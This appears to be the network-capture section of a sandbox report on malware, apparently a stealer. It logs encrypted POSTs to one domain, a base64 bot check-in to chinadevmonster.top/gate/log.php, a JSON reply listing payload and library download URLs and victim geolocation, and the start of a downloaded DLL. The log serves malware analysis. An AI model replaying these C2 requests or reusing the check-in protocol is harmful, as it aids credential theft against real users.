Sep 13, 2020 20:54:41.821449041 CEST	71	IN	Data Raw: e4 fc 31 46 1b b2 f4 c4 9d 09 cd 00 a3 18 9e c0 5a c7 50 74 a1 85 40 09 3c 2f 63 ac 52 51 95 d3 ed 0d de e4 84 3d 14 f8 4e 58 26 a8 5e bf 87 bb 36 d9 65 1e d2 fe 2b 06 74 4e 4f be 7a 2d e8 60 33 3c c7 b0 e9 d7 17 23 4e a0 28 9e fb 4d 8a fd 7b f6 Data Ascii: 1FZPt@</cRQ=NX&^6e+tNOz-`3<#N(M{Z}}C1U,M\^SF[ZsM0r/"~OsHlW>hezM@gB)#B-32pSD"3kjy0MSXu'$:$qK2
Sep 13, 2020 20:54:41.821461916 CEST	73	IN	Data Raw: ca b7 3f 48 ef f8 32 e3 12 cc ba b6 74 07 83 02 b3 be 82 fd 0b 2e 80 01 eb 99 2e 21 1b 47 26 cd 58 5c db 03 b9 64 01 de 35 ee 1e 29 7c ca 2d 6a f2 bb 29 ac a5 12 57 ed 45 0a 2e 3b dd 5c c0 00 ed 3c f3 18 06 26 16 d4 74 21 2b 06 62 a2 51 35 a9 3e Data Ascii: ?H2t..!G&X\d5)\|-j)WE.;\<&t!+bQ5>!\.=@BWl{c)r8"2%`bm?ezHE4g\|\>\Z$qobVq9{dCl!;{~+kkJifYEgJZYF.\|9Va~3%Phww#n
Sep 13, 2020 20:54:41.821469069 CEST	74	IN	Data Raw: 91 ee 62 c5 0f 01 69 37 54 ad 1f 03 c1 5e 78 33 5b 31 91 2b 4b b1 8c 43 ad c4 67 1f 63 b6 d3 75 cf 0d 0a 32 30 30 30 0d 0a d2 13 37 1f 71 3e 51 a8 5a bc 03 ed 07 4a d2 2d 14 c4 48 af e3 ca ce 11 3c 6f eb ab 63 e6 5e 49 17 78 78 b4 36 ee 6e 74 9b Data Ascii: bi7T^x3[1+KCgcu20007q>QZJ-H<oc^Ixx6nt\|4IZsh?Xga& 8co:;UlCg%'nQ&%dFD?#OLrlKXrcugdHq
Sep 13, 2020 20:54:41.821475983 CEST	75	IN	Data Raw: ae a2 ba b1 71 43 e0 11 07 84 f0 a0 f7 d8 9f 23 86 ae fa de a3 30 6c b8 1b ab bc 55 b2 5e 85 9c 96 96 b5 e3 86 e9 51 e3 8d eb e3 3f 0b db f1 93 f0 b2 b1 9b 44 84 87 87 eb 30 c5 b2 6a 26 f4 71 08 6b e2 d5 34 e0 ef 10 67 a6 cb 03 81 d2 6f 1a bb db Data Ascii: qC#0lU^Q?D0j&qk4goa`$$Xk9s2<ZMA*cpwMr#+E`BjT38-uHi6 vjz1t;OPPAS04UNt'{ \&gp
Sep 13, 2020 20:54:41.821481943 CEST	77	IN	Data Raw: f8 68 cb 65 50 68 d3 b6 37 27 59 d1 bf 5b c4 9c 6f d1 cb 0a 57 6b 3b 2e 23 1f 46 f6 9d 80 4a 75 fb 17 bc 7f 00 52 c2 aa 20 76 05 1d 28 91 53 b3 a8 c0 d3 62 a3 f6 15 c7 31 d0 cb fb 1e 5e af b6 72 12 6a b9 52 fa 54 62 22 af c1 8e 06 b8 e0 04 39 fd Data Ascii: hePh7'Y[oWk;.#FJuR v(Sb1^rjRTb"9RNBXN,1"+bH.x)_;9\W9zR-(rg4u[K<ypQ"EP#!.%2)yr~gIcZ"x@~Rqg*
Sep 13, 2020 20:54:41.821487904 CEST	78	IN	Data Raw: da 50 6e 23 60 9f d4 16 51 31 ba 82 23 ac ed 3d 28 74 93 b2 9c 9d 65 5e 2e f1 24 f2 8f 69 bd cf cb 31 4e 66 2d 98 74 07 ec a5 32 02 a3 87 92 b3 24 cf 13 d2 d6 f6 54 ed a1 65 86 00 0f 21 4f f8 0c 79 15 74 bc d5 17 64 78 72 b0 84 8f 86 a0 8b 79 9f Data Ascii: Pn#`Q1#=(te^.$i1Nf-t2$Te!Oytdxry1OFeay%1{"rR)[T5KW!2`}tevp(\=7Y&zl Yt^%s[1G.KId2blnfZueE
Sep 13, 2020 20:54:41.885708094 CEST	80	IN	Data Raw: 04 1c a1 bb 54 c7 7d 01 50 21 b6 21 93 eb 0b 4a ab 49 3b c7 76 9e 38 b4 ef 85 93 26 45 54 8e 9e f5 a7 e8 1d 04 a8 9a 2c 0c 63 7c 67 3f 13 3d 98 a6 a5 37 1c 10 6f ed fb 47 52 72 b4 8f 48 19 65 4b 98 3b 54 8d 0f 21 7c 7b 98 e6 3e 1a 58 a4 0b 40 71 Data Ascii: T}P!!JI;v8&ET,c\|g?=7oGRrHeK;T!\|{>X@q`}}nvk\_ T}?\|?}X{2K V_2,Z6\1QW*C$$0"i{{<i/GNAC)E)U\|n
Sep 13, 2020 20:54:45.071746111 CEST	616	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://2831ujedkdajsdj.info/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 139 Host: 2831ujedkdajsdj.info
Sep 13, 2020 20:54:45.072000980 CEST	616	OUT	Data Raw: dc 01 be a7 2e f5 54 65 3b e4 9c 0c 63 f7 46 5c ef 47 a1 61 82 90 b2 7a a1 fb 1a ad ea 22 ab 3a dc a2 6d 9e 0a 17 1a f3 b5 88 32 a2 42 bd 45 fc d7 64 9f d0 20 35 42 f3 2e f6 c1 af 3d a2 42 3f 4c 0a 7d 8c 6c 9b 64 39 f4 d8 56 35 a5 e3 64 7d 62 d8 Data Ascii: .Te;cF\Gaz":m2BEd 5B.=B?L}ld9V5d}biLDcKQYHv:hh)>p
Sep 13, 2020 20:54:45.155416965 CEST	617	IN	HTTP/1.1 404 Not Found Server: nginx/1.16.1 Date: Sun, 13 Sep 2020 18:54:45 GMT Content-Type: text/html; charset=windows-1251 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.2.31 Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Sep 13, 2020 20:54:45.329013109 CEST	618	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://2831ujedkdajsdj.info/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 144 Host: 2831ujedkdajsdj.info
Sep 13, 2020 20:54:45.329233885 CEST	618	OUT	Data Raw: dc 01 be a7 2e f5 54 65 3b e4 9c 0c 63 f7 46 5c ef 47 a1 61 82 90 b2 7a a1 fb 1a ad ea 22 ab 3a dc a2 6d 9e 0a 17 1a f3 b5 88 32 a2 42 bd 45 fc d7 64 9f d0 20 35 42 f3 2e f6 c1 af 3d a2 42 3f 4c 0a 7d 8c 6d 9b 65 39 f4 d8 57 35 a5 e3 3e 1f 0a 9b Data Ascii: .Te;cF\Gaz":m2BEd 5B.=B?L}me9W5>Im).&Jl<4YS#h*aR\|X[A#
Sep 13, 2020 20:54:45.407110929 CEST	619	IN	HTTP/1.1 404 Not Found Server: nginx/1.16.1 Date: Sun, 13 Sep 2020 18:54:45 GMT Content-Type: text/html; charset=windows-1251 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.2.31 Data Raw: 31 66 31 64 0d 0a 00 00 ca 5a 97 12 d4 b1 bf ff 7b ea a1 05 cd f1 8c de 43 59 6c bd 09 66 05 03 f2 e2 fa fe ea f4 23 60 6e 8f 5d ce 52 2d a6 db 7f b0 61 36 71 8b 2d ec 68 c1 2c 14 dd 60 30 ba 14 65 b5 75 4b 11 cf e7 e4 b9 82 07 31 9f 48 c4 54 25 56 f0 90 a7 02 7e b3 7c aa 1e 21 e4 6f b7 44 ac 0e 1c ba 80 69 4e 9c b5 ad 2d 7b 1b 5e b1 4c c8 e0 77 3b 81 54 a5 72 04 79 2b 27 02 ee c1 3a 84 ea d3 a1 4f aa 7a 39 ab 8d 70 37 11 f3 7f 2b dd cb 2f 6d c2 15 a3 8b fb e4 cd ac 78 f8 27 1f 38 d8 72 38 e0 ea 39 58 96 80 dc 3a 67 8d 33 98 90 32 eb bb 94 d1 79 f5 d1 df 9e 10 94 55 1c a9 94 72 8b f9 ac 9b 0e 06 68 dd ea d4 83 b7 c3 10 8e dc d7 b6 83 0d 45 5e b6 15 64 6d 5b 56 41 98 a3 5f 76 d3 ff 13 c0 f2 73 96 ce 36 5f b3 64 14 a2 05 cd 4b e1 81 88 d6 b0 d2 17 d6 dc e6 dd f1 a6 3b ce ed cb aa 2b d4 a6 aa a1 02 41 ac 90 3e 1b 8a 66 76 0b 90 94 0c 1a 4b cb 3c ca a5 48 51 5a 06 33 55 d0 f1 a2 45 28 29 5a bf 6f 42 98 0f d0 08 3e 43 88 9b 7b 39 0b 42 f3 24 65 23 08 d8 52 74 d3 17 64 38 70 dd 00 5e 49 2d 2b 0f 49 84 5c f4 c7 d7 ae c9 13 e8 ba ac 55 61 c9 ba 03 a9 8d cc d6 dc b5 9a 1b 98 d6 6f 24 6f 4d 12 29 da 79 3c a1 4e c4 e7 0b e9 5b 46 4b 8d 74 51 f5 e5 a5 84 00 d6 46 45 06 6e d3 87 7f ac 8c cc 7e 52 3b 26 d0 31 8c c0 ba 55 ea fa 8b e8 98 74 eb e0 62 57 af 14 41 5c 3d 1e e8 44 86 47 15 e7 9c 4a 61 05 54 8b 7e 6d ef f0 f6 f4 91 05 94 6c f5 51 38 c8 68 87 cd 19 b1 2b 30 55 14 7c df d9 25 e0 17 b3 f6 2c 31 f0 21 74 cf eb 85 4b 7f 96 d3 a1 ba 23 87 28 94 9b 40 68 58 31 81 ca 06 a4 2f 65 28 eb 2f 2e f3 bf 0f 0d 3e 0d fa 37 75 69 20 42 0b b4 7c 76 74 2f bb 51 56 8f 01 85 2e 95 08 39 fa 16 1a ff 7b 49 44 0d 27 6c d2 34 d6 44 3d 98 f8 9e cd 66 e7 5c 65 ad 17 82 8f cc 86 38 cc 07 05 55 b5 ce 2c bb e3 e5 6c 15 f4 eb 48 9a 21 b4 e3 6b de e5 6d 89 9a 59 26 27 a4 59 cf 09 49 23 46 40 9e 60 1d 90 b3 91 75 8b f8 d2 d7 27 eb c1 d5 78 93 ef eb e2 8c bb 85 97 ee ba d4 dd 03 7c 98 88 c5 ad f0 67 59 81 59 24 c3 dd c1 a1 6b b4 a0 2f 89 20 ce 1a cf b3 fd 86 47 1f fc ea e7 81 54 72 af 43 d3 79 af cf 56 fd 93 78 44 d1 41 de d9 9d 42 01 27 60 de 4b 37 35 6b 31 6e d6 9b 15 3f b0 91 34 63 e5 de 4f 3b f8 00 fc 2b 15 13 4d 96 b0 fc 66 60 89 a1 e2 e2 db ba 22 9d fd a8 81 74 29 8a 4b 51 71 03 ba a0 76 82 ea 79 bb ab dc d5 23 07 04 a7 3d 20 0b de 92 89 81 5e a7 57 5e 33 a9 3b f0 4c 8e 09 39 df 12 5b 79 74 d7 fa 4c 7d 38 80 93 8a 18 55 10 7f 5a ce 85 53 17 33 80 60 a6 41 cd 09 0c b0 37 ff 11 89 eb c7 58 b3 2b c6 68 65 a2 31 e8 4c d7 c6 70 e1 4d 2c 06 c4 61 3f 25 33 61 b0 ce cb d1 7c 74 30 1f 3e d4 a1 ba d5 a4 f6 2b 2b 1f 09 b4 cb 3f 73 a0 62 ee 39 ac a8 bc de b4 0b 65 9e c5 49 66 93 e7 4b 85 b9 9d 99 fb 71 85 3f 6d 2a b8 f2 cf fd 67 e0 da da 9e ab ca 9c 9e 4e 3b a1 ae 35 b7 e3 8d 55 fc 76 cc 95 52 22 f3 84 9a 67 f5 70 36 a9 5d f6 2d 19 e2 ff 96 d7 54 df f8 f2 68 ee ab 4e 1d ee 5c ba e1 4f aa 6c 96 a5 49 f4 1f e0 ab 88 6b a2 48 c4 a5 3c 74 25 bf 43 9c 7b 27 bf 71 68 11 df eb 56 55 4b 53 76 4f 25 05 c2 7e 3c a7 23 91 5b 49 c9 af 5c 38 29 ee 87 bd 13 54 7a b1 45 78 d6 8f f3 2e ee fa 25 2a d1 08 74 7a 89 fc 3d e2 d0 38 67 90 16 3e 48 89 97 b4 1f e7 9d 1b 6d 5e 20 b7 74 e3 d1 2e d8 2e 1f cc 3f c9 f9 1e f3 81 8e 4f 06 ab d8 0c 1a 2a ec 2d fd 59 10 58 e5 8e 6d a4 29 80 9d aa 56 67 a7 18 a9 b0 ba e6 8a 8a 00 b7 14 b6 3b b6 85 2b ba 47 77 37 7a 32 5e db fd 56 81 d7 e9 e9 03 b5 39 30 6f 98 29 55 a7 0d 4e 0b a8 83 2c 35 96 5d f4 46 5e b2 2f 25 e3 1c 84 a5 bc 4b 9e 7e 77 18 83 09 d7 1d 1f 57 22 aa 69 8e d9 b5 63 78 e4 4e 34 09 cf 4b b4 b7 30 Data Ascii: 1f1dZ{CYlf#`n]R-a6q-h,`0euK1HT%V~\|!oDiN-{^Lw;Try+':Oz9p7+/mx'8r89X:g32yUrhE^dm[VA_vs6_dK;+A>fvK<HQZ3UE()ZoB>C{9B$e#Rtd8p^I-+I\Uao$oM)y<N[FKtQFEn~R;&1UtbWA\=DGJaT~mlQ8h+0U\|%,1!tK#(@hX1/e(/.>7ui B\|vt/QV.9{ID'l4D=f\e8U,lH!kmY&'YI#F@`u'x\|gYY$k/ GTrCyVxDAB'`K75k1n?4cO;+Mf`"t)KQqvy#= ^W^3;L9[ytL}8UZS3`A7X+he1LpM,a?%3a\|t0>++?sb9eIfKq?mgN;5UvR"gp6]-ThN\OlIkH<t%C{'qhVUKSvO%~<#[I\8)TzEx.%tz=8g>Hm^ t..?O*-YXm)Vg;+Gw7z2^V90o)UN,5]F^/%K~wW"icxN4K0
Sep 13, 2020 20:54:47.786706924 CEST	825	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://2831ujedkdajsdj.info/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 294 Host: 2831ujedkdajsdj.info
Sep 13, 2020 20:54:47.786914110 CEST	825	OUT	Data Raw: dc 01 be a7 2e f5 54 65 3b e4 9c 0c 63 f7 46 5c ef 47 a1 61 82 90 b2 7a a1 fb 1a ad ea 22 ab 3a dc a2 6d 9e 0a 17 1a f3 b5 88 32 a2 42 bd 45 fc d7 64 9f d0 20 35 42 f3 2e f6 c1 af 3d a2 42 3f 4c 0a 7d 8c 6c 9b 65 39 f4 d8 56 35 a5 e3 44 0a 7f f2 Data Ascii: .Te;cF\Gaz":m2BEd 5B.=B?L}le9V5Diyy+ZvT Mcc?+TyLBe!CrS}3q8kSA~>!c=Hp{CVS=hs _/,dJq:`,Vkd!&&&
Sep 13, 2020 20:54:47.860716105 CEST	826	IN	HTTP/1.1 404 Not Found Server: nginx/1.16.1 Date: Sun, 13 Sep 2020 18:54:47 GMT Content-Type: text/html; charset=windows-1251 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.2.31 Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49721	47.245.136.23	80	C:\Users\user\AppData\Local\Temp\3BD3.exe

Timestamp	kBytes transferred	Direction	Data
Sep 13, 2020 20:55:05.265815973 CEST	854	OUT	POST /gate/log.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 155 Host: chinadevmonster.top
Sep 13, 2020 20:55:05.266124964 CEST	854	OUT	Data Raw: 70 61 72 61 6d 73 3d 59 6d 39 30 58 32 6c 6b 50 54 63 78 4e 30 55 78 51 6a 4d 30 4c 54 59 78 4e 44 41 74 4e 45 5a 44 4f 43 31 43 4e 44 6b 33 4c 55 49 33 4f 44 41 77 51 30 46 42 4e 30 55 30 4d 46 39 6e 61 47 46 75 61 53 5a 6a 62 32 35 6d 61 57 64 Data Ascii: params=Ym90X2lkPTcxN0UxQjM0LTYxNDAtNEZDOC1CNDk3LUI3ODAwQ0FBN0U0MF9naGFuaSZjb25maWdfaWQ9NzMzZjA0Njg5ZDdkNTVlNTY0Zjg1MjQ0MWE0ZTAwY2RiNzAxNzE5NSZkYXRhPW51bGw=
Sep 13, 2020 20:55:05.411256075 CEST	855	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 13 Sep 2020 18:55:05 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Data Raw: 32 35 61 0d 0a 7b 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 63 68 69 6e 61 64 65 76 6d 6f 6e 73 74 65 72 2e 74 6f 70 2f 66 69 6c 65 5f 68 61 6e 64 6c 65 72 34 2f 66 69 6c 65 2e 70 68 70 3f 68 61 73 68 3d 32 39 61 34 38 64 33 36 34 35 35 36 37 37 61 64 66 61 33 66 64 39 38 36 36 34 34 35 34 36 32 64 31 39 64 66 61 35 39 36 26 6a 73 3d 63 32 31 39 32 62 38 38 38 31 65 39 65 38 36 66 64 61 65 35 39 33 33 38 39 34 38 36 36 38 33 35 34 62 63 64 35 65 32 64 26 63 61 6c 6c 62 61 63 6b 3d 68 74 74 70 3a 2f 2f 63 68 69 6e 61 64 65 76 6d 6f 6e 73 74 65 72 2e 74 6f 70 2f 67 61 74 65 22 2c 22 61 74 74 61 63 68 6d 65 6e 74 5f 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 63 68 69 6e 61 64 65 76 6d 6f 6e 73 74 65 72 2e 74 6f 70 2f 67 61 74 65 2f 73 71 6c 69 74 65 33 2e 64 6c 6c 22 2c 22 6c 69 62 72 61 72 69 65 73 22 3a 22 68 74 74 70 3a 2f 2f 63 68 69 6e 61 64 65 76 6d 6f 6e 73 74 65 72 2e 74 6f 70 2f 67 61 74 65 2f 6c 69 62 73 2e 7a 69 70 22 2c 22 69 70 22 3a 22 39 31 2e 31 33 32 2e 31 33 36 2e 32 30 36 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 7b 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 43 48 22 2c 22 73 74 61 74 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 73 74 61 74 65 5f 63 6f 64 65 22 3a 22 5a 48 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 38 30 31 30 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 37 2e 33 39 32 35 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 38 2e 34 35 34 36 7d 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 6d 61 73 6b 73 22 3a 6e 75 6c 6c 2c 22 6c 6f 61 64 65 72 5f 75 72 6c 73 22 3a 6e 75 6c 6c 7d 2c 22 6c 75 22 3a 6e 75 6c 6c 2c 22 72 6d 22 3a 31 2c 22 69 73 5f 73 63 72 65 65 6e 5f 65 6e 61 62 6c 65 64 22 3a 30 2c 22 69 73 5f 68 69 73 74 6f 72 79 5f 65 6e 61 62 6c 65 64 22 3a 30 2c 22 64 65 70 74 68 22 3a 33 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 25a{"url":"http://chinadevmonster.top/file_handler4/file.php?hash=29a48d36455677adfa3fd9866445462d19dfa596&js=c2192b8881e9e86fdae59338948668354bcd5e2d&callback=http://chinadevmonster.top/gate","attachment_url":"http://chinadevmonster.top/gate/sqlite3.dll","libraries":"http://chinadevmonster.top/gate/libs.zip","ip":"91.132.136.206","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8010,"latitude":47.3925,"longitude":8.4546},"config":{"masks":null,"loader_urls":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49722	47.245.136.23	80	C:\Users\user\AppData\Local\Temp\3BD3.exe

Timestamp	kBytes transferred	Direction	Data
Sep 13, 2020 20:55:06.672116041 CEST	856	OUT	GET /gate/sqlite3.dll HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: chinadevmonster.top Connection: Keep-Alive
Sep 13, 2020 20:55:06.730787992 CEST	857	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 13 Sep 2020 18:55:06 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: close Last-Modified: Mon, 18 Mar 2019 19:52:10 GMT ETag: "5c8ff6ea-dfcff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata \|@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92@B
